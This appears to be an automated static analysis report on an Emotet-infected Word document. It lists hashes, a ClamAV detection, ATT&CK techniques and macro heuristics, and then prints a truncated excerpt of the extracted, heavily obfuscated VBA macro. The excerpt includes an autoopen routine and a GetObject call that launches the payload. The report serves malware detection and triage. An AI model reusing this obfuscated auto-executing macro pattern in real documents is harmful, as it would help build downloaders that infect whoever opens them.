Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a232af0c3f002cd8…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 175.5 KB
Created: 2019-03-28 07:34:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: cf35aadddcdddbacec25028b5b93f045
SHA-1: 14f39e31b5c26709232b659c07ddf3c8e807ac0c
SHA-256: a232af0c3f002cd836681fd5a0390a0f1c59ebf19ff49f4b31fb7462610cfcd2
Risk score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file exhibits high-severity heuristics for legacy WordBasic and VBA macros, including an AutoOpen function and GetObject calls, strongly indicating malicious intent. ClamAV detection confirms this, identifying it as Doc.Downloader.Emotet-6915305-0. The VBA script is heavily obfuscated, but the presence of macro execution and downloader indicators suggests it is designed to fetch and execute a secondary payload, consistent with Emotet's typical behavior.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6915305-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6915305-0.
  • Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen combined with ToolsMacro/MacroFile/fileMacro/globMacro, or the names of known historical macro viruses. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings)
    The document contains VBA macro code.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    The VBA project defines an AutoOpen macro, which Word runs automatically when the document is opened.
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    The macro code calls GetObject.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches documents that carry only p-code, or whose source extraction fails, so that no visible macro source is available.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 25675 bytes
    SHA-256: 5b57594b420b797391389a3649cc7497ec1e394e770f02bc2497b34689f9d83a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "jooZAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ZU1xZD"
Attribute VB_Base = "0{83BF4707-3F24-4183-857C-7B12177EED94}{1909587A-C4B5-43A2-88BC-325096C60567}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "kAAAAA_U"
Attribute VB_Base = "0{E0A2B2AB-D852-4A19-9A5D-F661CC51EDA8}{2F4E8E74-7827-4642-BA64-B5D76A42AA96}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "i_BAXA"
Function uw4AcDX()
   If DUkkwQ = XDGDAox Then
         kAQ4wXBU = (235556788 - zABDAQAA * FBADZ4 * CDate(938795689))
         v1cA_BwU = cUcAA_ / Oct(dDQDBA) - PwAABAA * CDbl(397489556) / AAUwADc * Fix(233936086 * Log(FCAooDDc)) / lDZoQxAD * Chr(621319222) * 922619092 * Sgn(wU_UBAA / Log(476854112))
End If
   If fAZUUBAA = iwXAXA Then
         CoQ4c_ = (709593237 - dAA_AAA4 * iGUXGA * CDate(400110449))
         ToAc_GU = AAxG_ADZ / Oct(aQABQ1Q) - jDABXAo * CDbl(892960113) / zAADx4Zx * Fix(915305922 * Log(rXXBQQk)) / jCxQGBAA * Chr(846108883) * 527521756 * Sgn(WAXQAU / Log(241148660))
End If
   If TCUBCUGw = T_AUkZ Then
         jXDcAkA = (877222339 - TAcZAw * ocDQAA_ * CDate(182867707))
         mAXkBA4 = TA1UDo_ / Oct(QoBBQUAw) - XCQBAx * CDbl(145539558) / MAUADU * Fix(254373412 * Log(dxG1BGB)) / HA_U4QQ * Chr(97729511) * 582456236 * Sgn(hUCCA4 / Log(714752817))
End If
   If mD_AGA = nAAADAG_ Then
         BAZUAA = (121556851 - JGBxA_ * qZoAUAx * CDate(297369654))
         Kk4kQx = u4Akw1XA / Oct(JUBAQU) - oBAD_kAc * CDbl(920085024) / DABUABc * Fix(222807042 * Log(iw_BQk)) / w4oAAw_U * Chr(792208741) * 108921259 * Sgn(MDBAAA / Log(604241754))
End If
   If ZQAcwAD1 = pAUkGc Then
         XZ_QADA = (331181219 - JAUXDD * ZAAAXDQ * CDate(686442739))
         SXGACAB = lUQAoC / Oct(LA4UAw) - NAXADck * CDbl(903749758) / HUA1AAcA * Fix(191064247 * Log(tAAXcBAB)) / w4QU1A * Chr(65807350) * 831082313 * Sgn(hcAQAXA / Log(771417014))
End If
   If JAZQxQAD = vcQcw_ Then
         c4CD41DA = (216452676 - ZBAXQA * OAABA4AA * CDate(498601541))
         vwoXcoCk = X1AXAU / Oct(pQBAAQ) - mk_B_B_ * CDbl(448687516) / jUA1AAAA * Fix(832843724 * Log(hGw1AUQA)) / EX_kAAU * Chr(722333304) * 872992297 * Sgn(ZXQAAZCA / Log(838024670))
End If
   If aABAAZA = fADDkAw Then
         OxAcAA4c = (843573593 - lAAAA1AU * qAUDBZAw * CDate(935670127))
         VDAUUQA = OGA_oo / Oct(WAcBCx) - bAAGAQAA * CDbl(525877038) / OGCQAxA * Fix(641409815 * Log(wZcxxQkA)) / CBZXAoU * Chr(31558628) * 512079559 * Sgn(wBwwAZx / Log(861579552))
End If
   If jBwAooUG = IAZUXA Then
         S4AxAX = (139405056 - dA_wcUAA * YAAB1_A * CDate(558321715))
         pQkDwAGZ = CXBcAQ_ / Oct(bXoXZx) - okQAAAA * CDbl(92688819) / TcGAAw_Q * Fix(287661511 * Log(jQxAUXAA)) / DkooDDw * Chr(413344851) * 736504179 * Sgn(GcAcZQDG / Log(712957930))
End If
End Function
Sub autoopen()
On Error Resume Next
   If zQ1AGDUA = bAAAxAA Then
         ZXAwUAo4 = (726693920 - IAUAD4B * aCUDBA * CDate(510912578))
         TBAxX_ = dABAAGB / Oct(nAD1Aw) - MQZBDDB * CDbl(693134375) / GZABA1x * Fix(27778498 * Log(aA1koAB)) / BCAwDC * Chr(924844580) * 249414303 * Sgn(rxk_AA / Log(686878550))
End If
   If kDBXZUX = YXkAwZBA Then
         JAXDUQB = (888232537 - CQABQA * s4QAUXGA * CDate(202978636))
         iDAwAD = AAAABDw / Oct(v1Q4BBoB) - McUkB44A * CDbl(947073108) / bZAkGBA * Fix(677800470 * Log(IBcDA_)) / NxAAAZQ4 * Chr(36548213) * 853267047 * Sgn(h1ZkDQ / Log(715878846))
End If
Set FABQ4A = GetObject(ZU1xZD.ZZUUAx + kAAAAA_U.i_k1B_ + ZU1xZD.ZZUUAx.Tag)
   If LoQBXX = pZUUCAB Then

... (truncated)